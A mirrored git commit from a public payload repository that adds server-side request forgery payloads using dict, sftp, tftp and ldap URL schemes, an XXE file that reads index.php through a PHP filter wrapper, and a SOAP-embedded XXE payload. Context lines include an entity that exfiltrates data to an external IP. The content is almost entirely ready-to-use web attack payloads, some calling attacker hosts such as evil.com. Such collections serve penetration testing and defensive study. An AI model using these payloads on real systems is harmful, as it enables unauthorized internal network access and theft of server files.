mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
SSRF URL Scheme + XXE Soap
This commit is contained in:
parent
91e3c6906c
commit
9adb81e6d8
@ -71,7 +71,33 @@ requests + browsers : 2.2.2.2
|
|||||||
urllib : 3.3.3.3
|
urllib : 3.3.3.3
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SSRF via URL Scheme
|
||||||
|
Dict://
|
||||||
|
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||||
|
```
|
||||||
|
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
|
||||||
|
ssrf.php?url=dict://attacker:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Sftp://
|
||||||
|
```
|
||||||
|
ssrf.php?url=sftp://evil.com:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Tftp://
|
||||||
|
```
|
||||||
|
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
|
||||||
|
```
|
||||||
|
|
||||||
|
Ldap://
|
||||||
|
```
|
||||||
|
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||||
|
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
10
XXE injections/Files/XXE PHP Wrapper.xml
Normal file
10
XXE injections/Files/XXE PHP Wrapper.xml
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
||||||
|
<contacts>
|
||||||
|
<contact>
|
||||||
|
<name>Jean &xxe; Dupont</name>
|
||||||
|
<phone>00 11 22 33 44</phone>
|
||||||
|
<adress>42 rue du CTF</adress>
|
||||||
|
<zipcode>75000</zipcode>
|
||||||
|
<city>Paris</city>
|
||||||
|
</contact>
|
||||||
|
</contacts>
|
@ -96,6 +96,13 @@ File stored on http://92.222.81.2/dtd.xml
|
|||||||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XXE Inside SOAP
|
||||||
|
```
|
||||||
|
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
||||||
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
|
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
|
||||||
|
* https://gist.github.com/staaldraad/01415b990939494879b4
|
||||||
|
Loading…
Reference in New Issue
Block a user